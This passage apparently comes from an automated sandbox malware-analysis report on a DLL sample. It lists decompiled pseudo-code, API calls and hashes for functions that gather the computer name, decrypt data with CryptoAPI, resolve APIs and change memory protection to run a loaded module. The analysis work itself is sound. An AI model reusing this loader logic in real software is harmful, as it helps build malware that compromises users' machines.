                    • Opcode Fuzzy Hash: b0c5b14f276f5492b38c78d507bfcffce29d468af27afb329b1c58bcc8d062bd
                    • Instruction Fuzzy Hash: 3F215C7180030ADFEB14CF85C885AEAF7F8FF48395F01846AD606D7118E7B4AA65CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 47%
                    			E010C3B61(char* _a4, char** _a8) {
                    				char* _t7;
                    				char* _t11;
                    				char* _t14;
                    				char* _t16;
                    				char* _t17;
                    				char _t18;
                    				signed int _t20;
                    				signed int _t22;
                    
                    				_t16 = _a4;
                    				_push(0x20);
                    				_t20 = 1;
                    				_push(_t16);
                    				while(1) {
                    					_t7 = StrChrA();
                    					if(_t7 == 0) {
                    						break;
                    					}
                    					_t20 = _t20 + 1;
                    					_push(0x20);
                    					_push( &(_t7[1]));
                    				}
                    				_t11 = E010C63FD(_t20 << 2);
                    				_a4 = _t11;
                    				if(_t11 != 0) {
                    					StrTrimA(_t16, 0x10c9284); // executed
                    					_t22 = 0;
                    					do {
                    						_t14 = StrChrA(_t16, 0x20);
                    						if(_t14 != 0) {
                    							 *_t14 = 0;
                    							do {
                    								_t14 =  &(_t14[1]);
                    								_t18 =  *_t14;
                    							} while (_t18 == 0x20 || _t18 == 9);
                    						}
                    						_t17 = _a4;
                    						 *(_t17 + _t22 * 4) = _t16;
                    						_t22 = _t22 + 1;
                    						_t16 = _t14;
                    					} while (_t14 != 0);
                    					 *_a8 = _t17;
                    				}
                    				return 0;
                    			}

                    APIs
                    • StrChrA.SHLWAPI(?,00000020,00000000,037A95AC,?,?,010C104B,?,037A95AC), ref: 010C3B7D
                    • StrTrimA.SHLWAPI(?,010C9284,00000002,?,010C104B,?,037A95AC), ref: 010C3B9B
                    • StrChrA.SHLWAPI(?,00000020,?,010C104B,?,037A95AC), ref: 010C3BA6
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Trim
                    • String ID:
                    • API String ID: 3043112668-0
                    • Opcode ID: 7eb3ed976943121f3154f54e55ab520d5ab355d3de76cde15a1b61cf68314163
                    • Instruction ID: e8a4f2c62c3e82b18011071b2f1630a3356be71b1d66a78d4f983967cc925ceb
                    • Opcode Fuzzy Hash: 7eb3ed976943121f3154f54e55ab520d5ab355d3de76cde15a1b61cf68314163
                    • Instruction Fuzzy Hash: 4B014C713102456EE7605B2ACC49F5A7BDDEBC9A94F048059ABC5CF282D570D8428A60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C607D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                    				int _v12;
                    				signed int _v16;
                    				void* _v20;
                    				signed char _v36;
                    				void* _t24;
                    				intOrPtr _t27;
                    				void* _t35;
                    				signed char* _t46;
                    				int _t53;
                    				void* _t55;
                    				void* _t56;
                    				void* _t57;
                    
                    				_v16 = _v16 & 0x00000000;
                    				_t46 = _a4;
                    				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                    				_v12 = 0x110;
                    				_t24 = E010C63FD(_t53);
                    				_a4 = _t24;
                    				if(_t24 != 0) {
                    					memcpy(_t24,  *0x10ca374, 0x110);
                    					_t27 =  *0x10ca378; // 0x0
                    					_t57 = _t56 + 0xc;
                    					if(_t27 != 0) {
                    						_t51 = _a4;
                    						E010C43A6(0x110, _a4, _t27, 0);
                    					}
                    					if(E010C5B65( &_v36) != 0) {
                    						_t35 = E010C4872(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                    						if(_t35 == 0) {
                    							_t55 = _v20;
                    							_v36 =  *_t46;
                    							_v16 = E010C6412(_t55, _a8, _t51, _t46, _a12);
                    							 *(_t55 + 4) = _v36;
                    							_t20 =  &(_t46[4]); // 0xbf0845c7
                    							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
                    							_t57 = _t57 + 0xc;
                    							E010C17AB(_t55);
                    						}
                    					}
                    					memset(_a4, 0, _t53);
                    					E010C17AB(_a4);
                    				}
                    				return _v16;
                    			}

                    APIs
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • memcpy.NTDLL(00000000,00000110,?,?,?,?,010C4DD9,?,010C3AC6,010C3AC6,?), ref: 010C60B3
                    • memset.NTDLL ref: 010C6128
                    • memset.NTDLL ref: 010C613C
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: memset$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 1529149438-0
                    • Opcode ID: 36818a1076aa2f98746704bbdb15f83971cc28bfd9bad8702f44a39611df7f42
                    • Instruction ID: edeb7d4b633c8e72529081f401d6769b2263985f7c541ed1d8f35e1c4bea7aa0
                    • Opcode Fuzzy Hash: 36818a1076aa2f98746704bbdb15f83971cc28bfd9bad8702f44a39611df7f42
                    • Instruction Fuzzy Hash: F0217175A00119ABDB11EF65CC40FEE7BB8AF58A40F044069FD44E7241E735D6018FA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E010C5F80(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                    				void* _v8;
                    				void* __esi;
                    				intOrPtr* _t35;
                    				void* _t40;
                    				intOrPtr* _t41;
                    				intOrPtr* _t43;
                    				intOrPtr* _t45;
                    				intOrPtr* _t50;
                    				intOrPtr* _t52;
                    				void* _t54;
                    				intOrPtr* _t55;
                    				intOrPtr* _t57;
                    				intOrPtr* _t61;
                    				intOrPtr* _t65;
                    				intOrPtr _t68;
                    				void* _t72;
                    				void* _t75;
                    				void* _t76;
                    
                    				_t55 = _a4;
                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                    				_a4 = 0;
                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                    				if(_t76 < 0) {
                    					L18:
                    					return _t76;
                    				}
                    				_t40 = E010C14E4(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                    				_t76 = _t40;
                    				if(_t76 >= 0) {
                    					_t61 = _a28;
                    					if(_t61 != 0 &&  *_t61 != 0) {
                    						_t52 = _v8;
                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                    					}
                    					if(_t76 >= 0) {
                    						_t43 =  *_t55;
                    						_t68 =  *0x10ca320; // 0x26dd5a8
                    						_t20 = _t68 + 0x10cb1fc; // 0x740053
                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                    						if(_t76 >= 0) {
                    							_t76 = E010C63B0(_a4);
                    							if(_t76 >= 0) {
                    								_t65 = _a28;
                    								if(_t65 != 0 &&  *_t65 == 0) {
                    									_t50 = _a4;
                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                    								}
                    							}
                    						}
                    						_t45 = _a4;
                    						if(_t45 != 0) {
                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                    						}
                    						_t57 = __imp__#6;
                    						if(_a20 != 0) {
                    							 *_t57(_a20);
                    						}
                    						if(_a12 != 0) {
                    							 *_t57(_a12);
                    						}
                    					}
                    				}
                    				_t41 = _v8;
                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                    				goto L18;
                    			}

                    APIs
                      • Part of subcall function 010C14E4: SysAllocString.OLEAUT32(80000002), ref: 010C153B
                      • Part of subcall function 010C14E4: SysFreeString.OLEAUT32(00000000), ref: 010C15A0
                    • SysFreeString.OLEAUT32(?), ref: 010C605F
                    • SysFreeString.OLEAUT32(010C2BCC), ref: 010C6069
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloc
                    • String ID:
                    • API String ID: 986138563-0
                    • Opcode ID: 717154f6000c2fdbaf363a53cad0144a7e4469bec6633a33d1fdb66b69179409
                    • Instruction ID: f68f6298674456358ae6019b919d083959519d24db5b9c35b3b10ea17d41b7a1
                    • Opcode Fuzzy Hash: 717154f6000c2fdbaf363a53cad0144a7e4469bec6633a33d1fdb66b69179409
                    • Instruction Fuzzy Hash: D8310872500159EFCB21DF58C888CAFBBB9FF89B407244698FA459B211D732ED51CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E10001EA8() {
                    				char _v16;
                    				intOrPtr _v28;
                    				void _v32;
                    				void* _v36;
                    				intOrPtr _t16;
                    				void* _t17;
                    				long _t26;
                    				int _t27;
                    				void* _t31;
                    				intOrPtr* _t33;
                    				signed int _t37;
                    				intOrPtr _t39;
                    
                    				_t16 =  *0x100041d0;
                    				if( *0x100041ac > 5) {
                    					_t17 = _t16 + 0x100050f9;
                    				} else {
                    					_t17 = _t16 + 0x100050b1;
                    				}
                    				E10001A10(_t17, _t17);
                    				_t37 = 6;
                    				memset( &_v32, 0, _t37 << 2);
                    				if(E10001733( &_v32,  &_v16,  *0x100041cc ^ 0xf7a71548) == 0) {
                    					_t26 = 0xb;
                    				} else {
                    					_t27 = lstrlenW( *0x100041b8);
                    					_t8 = _t27 + 2; // 0x2
                    					_t11 = _t27 + _t8 + 8; // 0xa
                    					_t31 = E10001DCF(_t39, _t11,  &_v32,  &_v36); // executed
                    					if(_t31 == 0) {
                    						_t40 =  *0x100041b8;
                    						_t33 = _v36;
                    						 *_t33 = 0;
                    						if( *0x100041b8 == 0) {
                    							 *(_t33 + 4) =  *(_t33 + 4) & 0x00000000;
                    						} else {
                    							E100020FC(_t45, _t40, _t33 + 4);
                    						}
                    					}
                    					_t26 = E100011CA(_v28); // executed
                    				}
                    				ExitThread(_t26);
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: ExitThreadlstrlen
                    • String ID:
                    • API String ID: 2636182767-0
                    • Opcode ID: ad6c6029e475f8ec852d0dbf32e872dca2d5c9b741e1b9efc5396741c870abaf
                    • Instruction ID: bd2b8457e7f43d2138ce0c24819570377c37de41f18c9477cad12fa20dcd2f1c
                    • Opcode Fuzzy Hash: ad6c6029e475f8ec852d0dbf32e872dca2d5c9b741e1b9efc5396741c870abaf
                    • Instruction Fuzzy Hash: 2211BFB2904206ABF711DF64CC89EDB77EDEB043C0F024826FA04D3069EB30E9488B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C2985(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                    				void* _t24;
                    				signed short _t25;
                    				signed int _t27;
                    				intOrPtr* _t28;
                    				signed short _t29;
                    
                    				_t28 = __edi;
                    				if(_a4 == 0) {
                    					L2:
                    					_t29 = E010C1BC5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                    					if(_t29 == 0) {
                    						_t27 = _a12 >> 1;
                    						if(_t27 == 0) {
                    							_t29 = 2;
                    							HeapFree( *0x10ca2d8, 0, _a4);
                    						} else {
                    							_t24 = _a4;
                    							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                    							 *_t28 = _t24;
                    						}
                    					}
                    					L6:
                    					return _t29;
                    				}
                    				_t25 = E010C3CEA(_a4, _a8, _a12, __edi); // executed
                    				_t29 = _t25;
                    				if(_t29 == 0) {
                    					goto L6;
                    				}
                    				goto L2;
                    			}

                    APIs
                      • Part of subcall function 010C3CEA: SysFreeString.OLEAUT32(00000000), ref: 010C3D50
                    • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,010C33D6,?,004F0053,037A93D8,00000000,?), ref: 010C29E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Free$HeapString
                    • String ID: Ut
                    • API String ID: 3806048269-8415677
                    • Opcode ID: 329072f08cae04e65fff51a5d8e0567f7ba38f6edad9e3585dc903fe34dbe43b
                    • Instruction ID: 411afce48859509ac60fb9eb7afea35fa907841bfe5222eb93a4642a42a814b1
                    • Opcode Fuzzy Hash: 329072f08cae04e65fff51a5d8e0567f7ba38f6edad9e3585dc903fe34dbe43b
                    • Instruction Fuzzy Hash: A201D23210022AEBDB229F48CC45EEE7BA9FB04B90F058029FE855A521D6329960DF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E010C256F(void* __ecx) {
                    				signed int _v8;
                    				void* _t15;
                    				void* _t19;
                    				void* _t20;
                    				void* _t22;
                    				intOrPtr* _t23;
                    
                    				_t23 = __imp__;
                    				_t20 = 0;
                    				_v8 = _v8 & 0;
                    				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                    				_t10 = _v8;
                    				if(_v8 != 0) {
                    					_t20 = E010C63FD(_t10 + 1);
                    					if(_t20 != 0) {
                    						_t15 =  *_t23(3, _t20,  &_v8); // executed
                    						if(_t15 != 0) {
                    							 *((char*)(_v8 + _t20)) = 0;
                    						} else {
                    							E010C17AB(_t20);
                    							_t20 = 0;
                    						}
                    					}
                    				}
                    				return _t20;
                    			}

                    APIs
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,010C6999), ref: 010C2587
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,010C6999), ref: 010C25A4
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: ComputerHeapName$AllocateFree
                    • String ID:
                    • API String ID: 187446995-0
                    • Opcode ID: 7380b46cff05601056021b02481c9f5e09be2f8255d29028f259389edb71bd5a
                    • Instruction ID: fe9107b37b736bff696aed159d83158ee8e457b6ced2b802f453480ad5aa6731
                    • Opcode Fuzzy Hash: 7380b46cff05601056021b02481c9f5e09be2f8255d29028f259389edb71bd5a
                    • Instruction Fuzzy Hash: B3F05436A00105BBE721D79D8C14EAF76FCDBD5A50F1100ADE945D3141EAB0DE019B71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C45D2(signed int __edx, intOrPtr _a4) {
                    				void* _t3;
                    				void* _t5;
                    				void* _t8;
                    				void* _t9;
                    				void* _t10;
                    				signed int _t11;
                    
                    				_t11 = __edx;
                    				_t3 = HeapCreate(0, 0x400000, 0); // executed
                    				 *0x10ca2d8 = _t3;
                    				if(_t3 == 0) {
                    					_t9 = 8;
                    					return _t9;
                    				}
                    				 *0x10ca1c8 = GetTickCount();
                    				_t5 = E010C5A5A(_a4);
                    				if(_t5 == 0) {
                    					E010C2A4C(_t10, _a4); // executed
                    					if(E010C4C43(_t10) != 0) {
                    						 *0x10ca300 = 1; // executed
                    					}
                    					_t8 = E010C6535(_t11); // executed
                    					return _t8;
                    				}
                    				return _t5;
                    			}

                    APIs
                    • HeapCreate.KERNEL32(00000000,00400000,00000000,010C108E,?), ref: 010C45DB
                    • GetTickCount.KERNEL32 ref: 010C45EF
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: CountCreateHeapTick
                    • String ID:
                    • API String ID: 2177101570-0
                    • Opcode ID: 0f3581c37f3e0709c9d38d07c1e898ed6fabf04fa1ee0c3e2c98cca0afe0fc7c
                    • Instruction ID: 34ffea40aaa374c4ced042b8a3c13453239258987d2dc923f73f1c47f04959a7
                    • Opcode Fuzzy Hash: 0f3581c37f3e0709c9d38d07c1e898ed6fabf04fa1ee0c3e2c98cca0afe0fc7c
                    • Instruction Fuzzy Hash: 76E06D30740301EED7706B74AD5571D35E4BB64F46F20542CE5C4D21ADEBBA80009F22
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 34%
                    			E010C3CEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                    				intOrPtr _v12;
                    				void* _v18;
                    				short _v20;
                    				intOrPtr _t15;
                    				short _t17;
                    				intOrPtr _t19;
                    				short _t23;
                    
                    				_t23 = 0;
                    				_v20 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosw");
                    				_t15 =  *0x10ca320; // 0x26dd5a8
                    				_t4 = _t15 + 0x10cb39c; // 0x37a8944
                    				_t20 = _t4;
                    				_t6 = _t15 + 0x10cb124; // 0x650047
                    				_t17 = E010C5F80(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                    				if(_t17 < 0) {
                    					_t23 = _t17;
                    				} else {
                    					if(_v20 != 8) {
                    						_t23 = 1;
                    					} else {
                    						_t19 = E010C2E8A(_t20, _v12);
                    						if(_t19 == 0) {
                    							_t23 = 8;
                    						} else {
                    							 *_a16 = _t19;
                    						}
                    						__imp__#6(_v12);
                    					}
                    				}
                    				return _t23;
                    			}

                    APIs
                      • Part of subcall function 010C5F80: SysFreeString.OLEAUT32(?), ref: 010C605F
                      • Part of subcall function 010C2E8A: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,010C25F5,004F0053,00000000,?), ref: 010C2E93
                      • Part of subcall function 010C2E8A: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,010C25F5,004F0053,00000000,?), ref: 010C2EBD
                      • Part of subcall function 010C2E8A: memset.NTDLL ref: 010C2ED1
                    • SysFreeString.OLEAUT32(00000000), ref: 010C3D50
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: FreeString$lstrlenmemcpymemset
                    • String ID:
                    • API String ID: 397948122-0
                    • Opcode ID: 718b171d16b49f4cfa0282083a4f750882f478023d02456df87d5837ee6b4ac4
                    • Instruction ID: 4470b36f1abee88e6d00b5d70b1d3b08ec0a54e2b02fafebc69a791b98d454da
                    • Opcode Fuzzy Hash: 718b171d16b49f4cfa0282083a4f750882f478023d02456df87d5837ee6b4ac4
                    • Instruction Fuzzy Hash: 3101B17251002AFFCB11AFA8DC04DEEBBB8FB04B00F408469FA85EB061D3B199158F91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E10001A10(void* __eax, intOrPtr _a4) {
                    
                    				 *0x100041c8 =  *0x100041c8 & 0x00000000;
                    				_push(0);
                    				_push(0x100041c4);
                    				_push(1);
                    				_push(_a4);
                    				 *0x100041c0 = 0xc; // executed
                    				L1000199C(); // executed
                    				return __eax;
                    			}

                    APIs
                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(10001ED5,00000001,100041C4,00000000), ref: 10001A2E
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: DescriptorSecurity$ConvertString
                    • String ID:
                    • API String ID: 3907675253-0
                    • Opcode ID: 303e5c0b8efcea9114878a4a52acd4642f3c65374f2921b9fab3e9b80a8aec8b
                    • Instruction ID: 03908131a901d61ed987414662d000861883ab9aa9f57079639177fb67c56f47
                    • Opcode Fuzzy Hash: 303e5c0b8efcea9114878a4a52acd4642f3c65374f2921b9fab3e9b80a8aec8b
                    • Instruction Fuzzy Hash: 9FC04CF8184310A6F710DB408CD5FD57651F764785F120608F200241D9CBF61094861D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E100011CA(void* __eax) {
                    				char _v8;
                    				void* _v12;
                    				void* __edi;
                    				void* _t18;
                    				long _t26;
                    				long _t29;
                    				intOrPtr _t40;
                    				void* _t41;
                    				intOrPtr* _t42;
                    				void* _t44;
                    
                    				_t41 = __eax;
                    				_t16 =  *0x100041cc;
                    				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x100041cc - 0x69b24f45 &  !( *0x100041cc - 0x69b24f45);
                    				_t18 = E100013D3( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x100041cc - 0x69b24f45 &  !( *0x100041cc - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x100041cc - 0x69b24f45 &  !( *0x100041cc - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                    				if(_t18 != 0) {
                    					_t29 = 8;
                    					goto L8;
                    				} else {
                    					_t40 = _v8;
                    					_t29 = E10001000(_t33, _t40, _t41);
                    					if(_t29 == 0) {
                    						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                    						_t29 = E10001BE8(_t40, _t44);
                    						if(_t29 == 0) {
                    							_t26 = E1000185B(_t44, _t40); // executed
                    							_t29 = _t26;
                    							if(_t29 == 0) {
                    								_push(_t26);
                    								_push(1);
                    								_push(_t40);
                    								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                    									_t29 = GetLastError();
                    								}
                    							}
                    						}
                    					}
                    					_t42 = _v12;
                    					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                    					E1000164B(_t42);
                    					L8:
                    					return _t29;
                    				}
                    			}

                    APIs
                      • Part of subcall function 100013D3: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001206,?,?,?,?,?,00000002,?,?), ref: 100013F7
                      • Part of subcall function 100013D3: GetProcAddress.KERNEL32(00000000,?), ref: 10001419
                      • Part of subcall function 100013D3: GetProcAddress.KERNEL32(00000000,?), ref: 1000142F
                      • Part of subcall function 100013D3: GetProcAddress.KERNEL32(00000000,?), ref: 10001445
                      • Part of subcall function 100013D3: GetProcAddress.KERNEL32(00000000,?), ref: 1000145B
                      • Part of subcall function 100013D3: GetProcAddress.KERNEL32(00000000,?), ref: 10001471
                      • Part of subcall function 10001BE8: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 10001C20
                      • Part of subcall function 1000185B: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 10001894
                      • Part of subcall function 1000185B: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001909
                      • Part of subcall function 1000185B: GetLastError.KERNEL32 ref: 1000190F
                    • GetLastError.KERNEL32(?,?), ref: 10001248
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                    • String ID:
                    • API String ID: 3135819546-0
                    • Opcode ID: 012aa7560561472682e7306df76b5795729a8b3fbbe4171940503fee8637ba20
                    • Instruction ID: e451b133e2c7bff8fd842aef35b2617cafd1dcb2e1507d8e8d7c0738109fe8f5
                    • Opcode Fuzzy Hash: 012aa7560561472682e7306df76b5795729a8b3fbbe4171940503fee8637ba20
                    • Instruction Fuzzy Hash: 2A11E67A600612ABE311DB95CCC0DDB77BDEF883D47054119FA05E7509EAB1FD058790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E010C7885(void* __ecx, void* __edx, void* _a4, void* _a8) {
                    				void* _t13;
                    				void* _t21;
                    
                    				_t11 =  &_a4;
                    				_t21 = 0;
                    				__imp__( &_a8);
                    				_t13 = E010C4872( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                    				if(_t13 == 0) {
                    					_t21 = E010C63FD(_a8 + _a8);
                    					if(_t21 != 0) {
                    						E010C213D(_a4, _t21, _t23);
                    					}
                    					E010C17AB(_a4);
                    				}
                    				return _t21;
                    			}






                    APIs
                    • lstrlen.KERNEL32(?,?,?,00000000,?,010C191E,00000000,?,?,?,010C6ABB,?,037A95B0), ref: 010C7896
                      • Part of subcall function 010C4872: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,010C3AC6), ref: 010C48AA
                      • Part of subcall function 010C4872: memcpy.NTDLL(?,010C3AC6,00000010,?,?,?,?,?,?,?,?,?,?,010C60F5,00000000,010C4DD9), ref: 010C48C3
                      • Part of subcall function 010C4872: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 010C48EC
                      • Part of subcall function 010C4872: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 010C4904
                      • Part of subcall function 010C4872: memcpy.NTDLL(00000000,010C4DD9,010C3AC6,0000011F), ref: 010C4956
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                    • String ID:
                    • API String ID: 894908221-0
                    • Opcode ID: a0c5dc9ef026d92495ad760142d2ae3100b38f27bfcaaf1c4d0c3c5834478f99
